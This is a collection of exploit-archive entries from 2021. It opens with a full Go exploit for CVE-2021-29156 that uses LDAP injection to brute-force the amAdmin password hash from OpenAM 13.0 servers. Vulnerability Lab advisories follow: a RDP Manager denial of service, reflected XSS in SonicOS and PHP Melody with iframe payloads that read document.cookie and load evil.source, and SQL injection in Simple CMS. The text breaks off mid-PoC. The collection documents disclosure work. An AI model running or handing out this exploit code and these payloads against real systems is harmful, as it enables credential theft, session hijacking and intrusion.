# Exploit Title: OpenAM 13.0 - LDAP Injection # Date: 03/11/2021 # Exploit Author: Charlton Trezevant, GuidePoint Security # Vendor Homepage: https://www.forgerock.com/ # Software Link: https://github.com/OpenIdentityPlatform/OpenAM/releases/tag/13.0.0, # https://backstage.forgerock.com/docs/openam/13/install-guide/index.html#deploy-openam # Version: OpenAM v13.0.0 # Tested on: go1.17.2 darwin/amd64 # CVE: CVE-2021-29156 # # This vulnerability allows an attacker to extract a variety of information # (such as a user’s password hash) from vulnerable OpenAM servers via LDAP # injection, using a character-by-character brute force attack. # # https://github.com/guidepointsecurity/CVE-2021-29156 # https://nvd.nist.gov/vuln/detail/CVE-2021-29156 # https://portswigger.net/research/hidden-oauth-attack-vectors package main // All of these dependencies are included in the standard library. import ( "container/ring" "fmt" "math/rand" "net/http" "net/url" "sync" "time" ) func main() { // Base URL of the target OpenAM instance baseURL := "http://localhost/openam/" // Local proxy (such as Burp) proxy := "http://localhost:8080/" // Username whose hash should be dumped user := "amAdmin" // Configurable ratelimit // This script can go very, very fast. But it's likely that would overload Burp and the target server. // The default ratelimit of 6 can retrieve a 60 character hash through a proxy in about 5 minutes and // ~1700 requests. rateLimit := 6 // Beginning of the LDAP injection payload. %s denotes the position of the username. payloadUsername := fmt.Sprintf(".well-known/webfinger?resource=http://x/%s)", user) partURL := fmt.Sprintf("%s%s", baseURL, payloadUsername) // Your LDAP injection payloads. %s denotes the position at which the constructed hash + next test character // will be inserted. // These are configured to dump password hashes. But you can reconfigure them to dump other data, such as // usernames/session IDs/etc depending on your use case. // N.B. you will likely need to update the brute-forcing keyspace depending on the data you're trying to dump. testCharPayload := "(sunKeyValue=userPassword=%s*)(%%2526&rel=http://openid.net/specs/connect/1.0/issuer" testCrackedPayload := "(sunKeyValue=userPassword=%s)(%%2526&rel=http://openid.net/specs/connect/1.0/issuer" // The keyspace for brute-forcing individual characters is stored in a ringbuffer // You may need to change how this is initialized depending on the types of data you're // trying to retrieve. By default, this is configured for password hashes. dict := makeRing() // Working characters for each step are concatenated with this string. Further tests are conducted // using this value as it's built. // Importantly, if you already have part of the hash you can put it here as a crib. This allows you // to resume a previous brute-forcing session. password := "" proxyURL, _ := url.Parse(proxy) // You can modify the HTTP client configuration below. // For example, to disable the HTTP proxy or set a different // request timeout value. client := &http.Client{ Transport: &http.Transport{ Proxy: http.ProxyURL(proxyURL), }, Timeout: 30 * time.Second, } // Channels used for internal signaling cracked := make(chan string, 1) foundChar := make(chan string, 1) wg := &sync.WaitGroup{} wg.Add(1) // All hacking tools need a header. You may experience a 10-15x performance improvement // if you replace the flower-covered header with the gothic bleeding/flaming/skull-covered // ASCII art typical of these kinds of tools. printHeader() loop: for { select { case <-cracked: // Full hash test succeeds, terminate everything // N.B. this feature does not work, see my comments on checkCracked. fmt.Printf("Cracked! Password hash is: \"%s\"\n", password) wg.Done() break loop case char := <-foundChar: // In the event that a test character succeeds, that thread will pass it along in the // foundChar channel to signal success. It's then concatenated with the known-good // password hash and the whole thing is tested in a query // This doesn't work because OpenAM doesn't respond to direct queries containing the password hash // in the manner I expect. But it might still work for other types of data. password += char fmt.Printf("Progress so far: '%s'\n", password) // Forgive these very ugly closures go (func(client *http.Client, url, payload *string, password string, cracked *chan string) { // Add random jitter before submitting request time.Sleep(time.Duration(rand.Intn(3)+3) * time.Microsecond) time.Sleep(1 * time.Second) checkCracked(client, url, payload, &password, cracked) })(client, &partURL, &testCharPayload, password, &cracked) default: for i := 0; i < rateLimit-1; i++ { testChar := dict.Value.(string) go (func(client *http.Client, url, payload *string, password, testChar string, foundChar *chan string) { time.Sleep(time.Duration(rand.Intn(3)+3) * time.Microsecond) time.Sleep(1 * time.Second) getChar(client, url, payload, &password, &testChar, foundChar) })(client, &partURL, &testCrackedPayload, password, testChar, &foundChar) dict = dict.Next() } time.Sleep(1 * time.Second) } } wg.Wait() } // checkCracked tests a complete string in a query against the OpenAM server to // determine whether the exact, full hash has been retrieved. // This doesn't actually work, because the server doesn't respond as I'd expect // A better implementation would probably watch until all positions in the ringbuffer // are exhausted in testing and terminate (since there's no way to progress further) func checkCracked(client *http.Client, targetURL, payload, password *string, cracked *chan string) { fullPayload := fmt.Sprintf(*payload, url.QueryEscape(*password)) fullURL := fmt.Sprintf("%s%s", *targetURL, fullPayload) req, err := http.NewRequest("GET", fullURL, nil) if err != nil { fmt.Printf("checkCracked: %s", err.Error()) return } res, err := client.Do(req) if err != nil { fmt.Printf("checkCracked: %s", err.Error()) return } if res.StatusCode == 200 { *cracked <- *password return } if res.StatusCode == 404 { return } fmt.Printf("checkCracked: got status code of %d for payload %s", res.StatusCode, payload) } // getChar tests a given character at the end position of the configured payload and dumped hash progress. func getChar(client *http.Client, targetURL, payload, password, testChar *string, foundChar *chan string) { // Concatenate test character -> password -> payload -> attack URL combinedPass := url.QueryEscape(fmt.Sprintf("%s%s", *password, *testChar)) fullPayload := fmt.Sprintf(*payload, combinedPass) fullURL := fmt.Sprintf("%s%s", *targetURL, fullPayload) req, err := http.NewRequest("GET", fullURL, nil) if err != nil { fmt.Printf("getChar: %s", err.Error()) return } res, err := client.Do(req) if err != nil { fmt.Printf("getChar: %s", err.Error()) return } if res.StatusCode == 200 { *foundChar <- *testChar return } if res.StatusCode == 404 { return } fmt.Printf("getChar: got status code of %d for payload %s", res.StatusCode, payload) } // makeRing instantiates a ringbuffer and initializes it with test characters common in base64 // and password hash encodings. // Bruteforcing on a character-by-character basis can only go as far as your dictionary will take // you, so be sure to update these strings if the keyspace for your use case is different. func makeRing() *ring.Ring { var upcase string = `ABCDEFGHIJKLMNOPQRSTUVWXYZ` var lcase string = `abcdefghijklmnopqrstuvwxyz` var num string = `1234567890` var punct string = `$+/.=` var dictionary string = upcase + lcase + num + punct buf := ring.New(len(dictionary)) for _, c := range dictionary { buf.Value = fmt.Sprintf("%c", c) buf = buf.Next() } return buf } // printHeader is cool. func printHeader() { fmt.Printf(` _______ ,---. ,---. .-''-. / __ \ | / | | .'_ _ \ | ,_/ \__)| | | .'/ ( ' ) ' ,-./ ) | | _ | |. (_ o _) | \ '_ '') | _( )_ || (_,_)___| > (_) ) __\ (_ o._) /' \ .---. ( . .-'_/ )\ (_,_) / \ '-' / '-''-' / \ / \ / '._____.' '---' ''-..-' .'''''-. .-'''''''-. .'''''-. ,---. .'''''-. .-''''-. ,---. ,--------. .------. .---. / ,-. \ / ,'''''''. \ / ,-. \ /_ | / ,-. \ / _ _ \ /_ | | _____| / .-. \ \ / (___/ | ||/ .-./ ) \| (___/ | | ,_ | (___/ | || ( ' ) | ,_ | | ) / / '--' | | .' / || \ '_ .')|| .' / ,-./ )| _ _ _ _ .' / | (_{;}_) |,-./ )| | '----. | .----. \ / _.-'_.-' ||(_ (_) _)|| _.-'_.-' \ '_ '') ( ' )--( ' ) _.-'_.-' | (_,_) |\ '_ '')|_.._ _ '. | _ _ '. v _/_ .' || / . \ || _/_ .' > (_) )(_{;}_)(_{;}_)_/_ .' \ | > (_) ) ( ' ) \| ( ' ) \ _ _ ( ' )(__..--.|| '-''"' || ( ' )(__..--.( . .-' (_,_)--(_,_)( ' )(__..--. '----' |( . .-' _(_{;}_) || (_{;}_) |(_I_) (_{;}_) |\'._______.'/(_{;}_) | '-''-'| (_{;}_) | .--. / / '-''-'| | (_,_) / \ (_,_) /(_(=)_) (_,_)-------' '._______.' (_,_)-------' '---' (_,_)-------' )_____.' '---' '...__..' '...__..' (_I_) ~ ~ (c) 2021 GuidePoint Security - charlton.trezevant@guidepointsecurity.com ~ ~ `) }

# Exploit Title: RDP Manager 4.9.9.3 - Denial-of-Service (PoC) # Date: 2021-10-18 # Exploit Author: Vulnerability Lab # Vendor Homepage: https://www.cinspiration.de/uebersicht4.html # Software Link: https://www.cinspiration.de/download.html # Version: 4.9.9.3 # Tested on: Linux Document Title: =============== RDP Manager v4.9.9.3 - Local Denial of Servie Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2309 Release Date: ============= 2021-10-18 Vulnerability Laboratory ID (VL-ID): ==================================== 2309 Common Vulnerability Scoring System: ==================================== 3.6 Vulnerability Class: ==================== Denial of Service Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== RDP-Manager is a program for the better administration of several remote desktops and further connections. The connection parameters as well as user name and password can be stored in the program, the latter also encrypted by an external password if desired. When opened, the connections created are clearly structured in individual tabs in the application window, which means that the overview is retained even if several connections are open. (Copy of the Homepage: https://www.cinspiration.de/download.html ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a local denial of service vulnerability in the RDP Manager v4.9.9.3 windows software client. Vulnerability Disclosure Timeline: ================================== 2021-06-01: Researcher Notification & Coordination (Security Researcher) 2021-06-02: Vendor Notification (Security Department) 2021-**-**: Vendor Response/Feedback (Security Department) 2021-**-**: Vendor Fix/Patch (Service Developer Team) 2021-**-**: Security Acknowledgements (Security Department) 2021-10-18: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Local Severity Level: =============== Low Authentication Type: ==================== Restricted Authentication (User Privileges) User Interaction: ================= No User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ A local denial of service vulnerability has been discovered in the official RDP Manager v4.9.9.3 windows software client. The denial of service attack allows an attacker to freeze, block or crash a local process, service or component to compromise. The local vulnerability is located in the Verbindungsname and Server input fields of the Verbindung (Neu/Bearbeiten). The Verbindungsname and Server inputs are not limited by the size of characters. Thus allows a local privileged attacker to add a malformed server entry with a large size that crashs (multiple application errors) the application permanently. The entry can be modified as zip backup for imports as sqLitedatabase.db3 to make the software unusable until a full reinstall with separate deletes is performed to recover. Successful exploitation of the denial of service vulnerability results in permanent unhandled software and application crashs. Vulnerable Input(s): [+] Verbindungsname [+] Server Affected Module(s): [+] Wiederherstellen (sqLitedatabase.db3) Proof of Concept (PoC): ======================= The local denial of service vulnerability can be exploited by attackers with system access privileges without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce ... 1. Install the RDP-Manager.exe software for windows 2. Start the software and add a new entry in the main tab 3. Include a large amount of characters max 1024 and save the entry 4. The software freezes and crashs with multiple errors in the actual session and after restart it crash permanently as well Note: Alternativly you can export a database with regular valid entry and modify it via backup for a import 5. Successful reproduce of the local denial of service vulnerability! Credits & Authors: ================== N/A - Anonymous [research@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=N%2FA+-+Anonymous Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ; https://www.vulnerability-db.com Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE LUDWIG-ERHARD STRAßE 4 34131 KASSEL - HESSEN DEUTSCHLAND (DE)

# Exploit Title: Sonicwall SonicOS 6.5.4 - 'Common Name' Cross-Site Scripting (XSS) # Date: 2021-10-18 # Exploit Author: Vulnerability Lab # Vendor Homepage: https://www.sonicguard.com/NSV-800.asp # Version: 6.5.4 Document Title: =============== Sonicwall SonicOS 6.5.4 - Cross Site Scripting Web Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2272 Release Date: ============= 2021-10-18 Vulnerability Laboratory ID (VL-ID): ==================================== 2272 Common Vulnerability Scoring System: ==================================== 5 Vulnerability Class: ==================== Cross Site Scripting - Non Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== The design, implementation and deployment of modern network architectures, such as virtualization and cloud, continue to be a game-changing strategy for many organizations. Virtualizing the data center, migrating to the cloud, or a combination of both, demonstrates significant operational and economic advantages. However, vulnerabilities within virtual environments are well-documented. New vulnerabilities are discovered regularly that yield serious security implications and challenges. To ensure applications and services are delivered safely, efficiently and in a scalable manner, while still combating threats harmful to all parts of the virtual framework including virtual machines (VMs), application workloads and data must be among the top priorities. (Copy of the Homepage: https://www.sonicguard.com/NSV-800.asp ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a non-persistent cross site scripting web vulnerability in the SonicWall SonicOS 6.5.4. Affected Product(s): ==================== Model: SonicWall SonicOS Firmware: 6.5.4.4-44v-21-1288-aa5b8b01 (6.5.4) OS: SonicOS Enhanced Vulnerability Disclosure Timeline: ================================== 2021-07-24: Researcher Notification & Coordination (Security Researcher) 2021-07-25: Vendor Notification (Security Department) 2021-**-**: Vendor Response/Feedback (Security Department) 2021-**-**: Vendor Fix/Patch (Service Developer Team) 2021-**-**: Security Acknowledgements (Security Department) 2021-10-18: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (Guest Privileges) User Interaction: ================= Medium User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A client-side input validation vulnerability has been discovered in the official SonicWall SonicOS 6.5.4. The vulnerability allows remote attackers to hijack sessionc credentials or manipulate client-side requested application content. The vulnerability is located in the common name input field in the Decryption Service - Common Name - Show Connection Failures module. Remote attackers with low privileged user accounts can inject own script codes to compromise session credentials. It is also possible to build special crafted html pages with get / post method requests to hijack non-expired user account sessions. The request method to inject is get and the attack vector is located on the client-side without being persistent. Successful exploitation of the vulnerability allows remote attackers to hijack session credentials (non-persistent), phishing (non-persistent), external redirect to malicious sources (non-persistent) or client-side application content manipulation. Exploitation of the vulnerability requires low or medium user interaction or a low privileged (restricted) user account. Module(s): [+] Decryption Service Vulnerable Function(s): [+] Edit (Bearbeiten) Vulnerable Parameter(s): [+] Common Name Affected Module(s): [+] Show Connection Failures Proof of Concept (PoC): ======================= The client-side cross site scripting web vulnerability can be exploited by remote attackers with user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Login as restricted or privileged user to the sonicWall sonicOS 6.5.4 virtual firewall application 2. Open the Decryption Service > Common Name > Show Connection Failures 3. Click on Edit and inject a js test payload into the restricted client content 4. Pushing anywhere else outsite field will temporarily save the payload 5. The script code immediately executes in the web browsers context 5. Successful reproduce of the script code inject web vulnerability! Vulnerable Source: Connection Failure List (getConnFailureList.json) <div id="connFailureEntriesDiv" style="overflow-y: scroll; height: 544px;"> <table summary="" width="100%" cellspacing="0" cellpadding="4" border="0"> <tbody id="connFailureEntries"><tr><td class="listItem" width="5%"><input type="checkbox" id="failChk4181252134" class="failChk" data-id="4181251300" data-name="sfPKI-4411CA162CD7931145552C4C87F9603D55FC.22" data-override-name="><iframe src=evil.source onload=alert(document.domain)>" data-failure="7" onclick="onClickFailCheckbox(this);"></td> <td class="listItem" width="15%">192.168.XX.XX</td><td class="listItem" width="15%">XX.XX.XX.XX</td> <td class="listItem" width="30%">>"<iframe src="evil.source" onload="alert(document.domain)"></iframe></td> --- PoC Session Logs (Cookie: SessId=F0FF65AA4C2B22B0655546584DCFAF65) --- https://nsv800.localhost:9281/evil.source Host: nsv800.localhost:9281 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: https://nsv800.localhost:9281/sslSpyConfigure.html Cookie: temp=; SessId=F0FF65AA4C2B22B0655546584DCFAF65 Upgrade-Insecure-Requests: 1 - GET: HTTP/1.0 200 OK Server: SonicWALL Content-type: text/html;charset=UTF-8 - https://nnsv800.localhost:9281/getJsonData.json?dataSet=alertStatus&_=1625248460727 Host: nsv800.localhost:9281 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br X-Requested-With: XMLHttpRequest Connection: keep-alive Referer: https://nsv800.localhost:9281/logo.html Cookie: temp=; SessId=F0FF65AA4C2B22B0655546584DCFAF65 - GET: HTTP/1.0 200 OK Server: SonicWALL Content-type: application/json Accept-Ranges: bytes Reference(s): nsv800.localhost:9281/main.html nsv800.localhost:9281/getJsonData.json nsv800.localhost:9281/sslSpyConfigure.html Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the client-side reflected script code through getJsonData.json and sslSpyConfigure. The input and output parameters needs to be sanitized to prevent script code injects. Security Risk: ============== The security risk of the client-side cross site web vulnerability in the sonicwall sonicos series is estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE LUDWIG-ERHARD STRAßE 4 34131 KASSEL - HESSEN DEUTSCHLAND (DE)

# Exploit Title: Simplephpscripts Simple CMS 2.1 - 'Multiple' SQL Injection # Date: 2021-10-19 # Exploit Author: Vulnerability Lab # Vendor Homepage: https://simplephpscripts.com/simple-cms-php # Version: 2.1 # Tested on: Linux Document Title: =============== Simplephpscripts Simple CMS v2.1 - SQL Injection References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2303 Release Date: ============= 2021-10-19 Vulnerability Laboratory ID (VL-ID): ==================================== 2303 Common Vulnerability Scoring System: ==================================== 7.1 Vulnerability Class: ==================== SQL Injection Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== The system could be used only in already existing websites to control their page sections and contents. Just paste a single line of code on your web page section and start controlling it through the admin area. Very simple installation - one step installation wizard. Option to include contents into web page sections through php include, javascript or iframe embed. Any language support. WYSIWYG(text) editor to styling and format contents of the sections. Suitable for web designers who work with Mobirise, Xara and other web builders. (Copy of the Homepage: https://simplephpscripts.com/simple-cms-php ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a remote sql-injection web vulnerability in the Simplephpscripts Simple CMS v2.1 web-application. Affected Product(s): ==================== Simplephpscripts Product: Simple CMS v2.1 - Content Management System (Web-Application) Vulnerability Disclosure Timeline: ================================== 2021-09-03: Researcher Notification & Coordination (Security Researcher) 2021-09-04: Vendor Notification (Security Department) 2021-**-**: Vendor Response/Feedback (Security Department) 2021-**-**: Vendor Fix/Patch (Service Developer Team) 2021-**-**: Security Acknowledgements (Security Department) 2021-10-19: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== High Authentication Type: ==================== Restricted Authentication (Moderator Privileges) User Interaction: ================= No User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ A remote sql-injection vulnerability has been discovered in the official creative zone web-application. The vulnerability allows remote attackers to inject or execute own sql commands to compromise the dbms or file system of the application. The sql-injection web vulnerability is located in the `newUser` and `editUser` function of the `users` module in the `admin.php` file. Remote attackers with privileged access to the panel are able to add users. If a user account already exists like for example the admin account, each add of the same name or email values results in a unfiltered mysql exception. The exception is not filtered and sanitized. Thus allows privileged attackers to inject and execute own sql commands on the affected database management system to compromise. The request method to inject is post and the attack vector is non-persistent. Exploitation of the sql injection vulnerability requires user interaction and a privileged web-application user account. Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise. Request Method(s): [+] POST Vulnerable Module(s): [+] newUser [+] editUser Vulnerable File(s): [+] admin.php?act=users Vulnerable Input(s): [+] Name [+] Username [+] Password Vulnerable Parameter(s): [+] name [+] username [+] password Affected Module(s): [+] Users (act=users) (Backend) Proof of Concept (PoC): ======================= The remote sql-injection web vulnerability can be exploited by remote attackers with privileged account and without user interaction. For security demonstration or to reproduce the sql injection vulnerability follow the provided information and steps below to continue. PoC: Example act=addUser&name=[ADD EXISITING DEFAULT VALUE!]&email=test@test.de&username=[ADD EXISITING DEFAULT VALUE!]&password=[ADD EXISITING DEFAULT VALUE!]&submit=Add User PoC: Exploitation act=addUser&name=[ADD EXISITING DEFAULT VALUE]-[SQL-INJECTION!]'&email=test@test.de&username=[ADD EXISITING DEFAULT VALUE]-[SQL-INJECTION!]'&password=a-1'&submit=Add User --- PoC Session Logs (POST) --- https://simple-cms.localhost:8000/simplecms/admin.php Host: simple-cms.localhost:8000 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Referer: https://simple-cms.localhost:8000/simplecms/admin.php?act=newUser Content-Type: application/x-www-form-urlencoded Content-Length: 132 Origin: https://simple-cms.localhost:8000 Connection: keep-alive Cookie: PHPSESSID=9smae9mm1m1misttrp1a2e1p23 act=addUser&name=[ADD EXISITING DEFAULT VALUE]-[SQL-INJECTION!]'&email=test@test.de&username=[ADD EXISITING DEFAULT VALUE]-[SQL-INJECTION!]'&password=[ADD EXISITING DEFAULT VALUE]-[SQL-INJECTION!]'&submit=Add User - POST: HTTP/2.0 200 OK server: Apache content-length: 1224 content-type: text/html; charset=UTF-8 --- SQL Error Exception Logs --- Error: SELECT * FROM cms2_users WHERE username='a%20-1' Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%20-1'' at line 1 Solution - Fix & Patch: ======================= 1. Disallow sql-errors to be displayed in the frontend and backend. Disable to redisplay the broken or malicious query on client-side. 2. Use prepared statement to protect the sql query of the post method request 3. Restrict the post parameters by disallow the usage of special chars with single or double quotes 4. Setup a filter or validation class to deny broken or manipulated sql queries Credits & Authors: ================== Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE LUDWIG-ERHARD STRAßE 4 34131 KASSEL - HESSEN DEUTSCHLAND (DE)

# Exploit Title: PHP Melody 3.0 - 'Multiple' Cross-Site Scripting (XSS) # Date: 2021-10-20 # Exploit Author: Vulnerability Lab # Vendor Homepage: https://www.phpsugar.com/phpmelody.html # Version: v3 # Tested on: Linux Document Title: =============== PHP Melody v3.0 - Multiple Cross Site Web Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2290 Bulletin: https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/ Release Date: ============= 2021-10-20 Vulnerability Laboratory ID (VL-ID): ==================================== 2290 Common Vulnerability Scoring System: ==================================== 5 Vulnerability Class: ==================== Cross Site Scripting - Non Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Upload, import, stream or embed any media. The smart way to manage audio & video. Comes with all the tools you need for online publishing. Beautiful content for your site. Allow users to create their channels, subscribe and follow the content they like. Podcast, mini-series, TV shows or movies. Everything is easier to publish with our CMS. Invest in a Secure Foundation. Build with a proven CMS. (Copy of the Homepage: https://www.phpsugar.com/phpmelody.html ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple non-persistent cross site scripting vulnerabilities in the PHP Melody v3.0 video cms web-application. Affected Product(s): ==================== PHPSUGAR Product: PHP Melody v3.0 - Video CMS (Web-Application) Vulnerability Disclosure Timeline: ================================== 2021-09-01: Researcher Notification & Coordination (Security Researcher) 2021-09-02: Vendor Notification (Security Department) 2021-09-04: Vendor Response/Feedback (Security Department) 2021-09-22: Vendor Fix/Patch (Service Developer Team) 2021-09-22: Security Acknowledgements (Security Department) 2021-10-20: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Pre Auth (No Privileges or Session) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ Multiple non-persistent cross site web vulnerabilities has been discovered in the official PHP Melody v3.0 video cms web-application. The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser to web-application requests by the client-side. The cross site scripting vulnerabilities are located in the `moved`, `username` and `keyword` parameters of the `categories.php`, `import.php` or `import-user.php` files. The injection point is located in the get method request and the execution occurs with non-persistent attack vector in the status message or exception of the admin panel ui. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected application modules. Request Method(s): [+] GET Vulnerable File(s): [+] categories.php [+] import-user.php [+] import.php Vulnerable Parameter(s): [+] move [+] username [+] keyword Affected Module(s): [+] Status Message & Exception Proof of Concept (PoC): ======================= The client-side cross site scripting web vulnerabilities can be exploited by remote attackers without account and with low user interaction. For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue. PoC: Payload %22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E PoC: Exploitation https://phpmelody.localhost.com:8080/admin/categories.php?type=genre&id=1&moved=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E - https://phpmelody.localhost.com:8080/admin/import-user.php?action=search&username=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E &results=50&autofilling=0&autodata=1&oc=1&utc=19&data_source=youtube&sub_id=24&page=1 - https://phpmelody.localhost.com:8080/admin/import.php?action=search&keyword=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&results=50&page=1&autofilling=0&autodata=1&oc=1&utc=7&search_category=Comedy&search_orderby=relevance&data_source=youtube&sub_id=4 PoC: Exploit <html> <head><body> <title>PHP Melody v3.0 - XSS PoC Exploit</title> #1 <iframe src="https://phpmelody.localhost.com:8080/admin/categories.php?type=genre&id=1&moved=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E" width="200" height="200"> </iframe> #2 <iframe src="https://phpmelody.localhost.com:8080/admin/import-user.php?action=search&username=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E" width="200" height="200"> &results=50&autofilling=0&autodata=1&oc=1&utc=19&data_source=youtube&sub_id=24&page=1 </iframe> #3 <iframe src="https://phpmelody.localhost.com:8080/admin/import.php?action=search&keyword=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E" width="200" 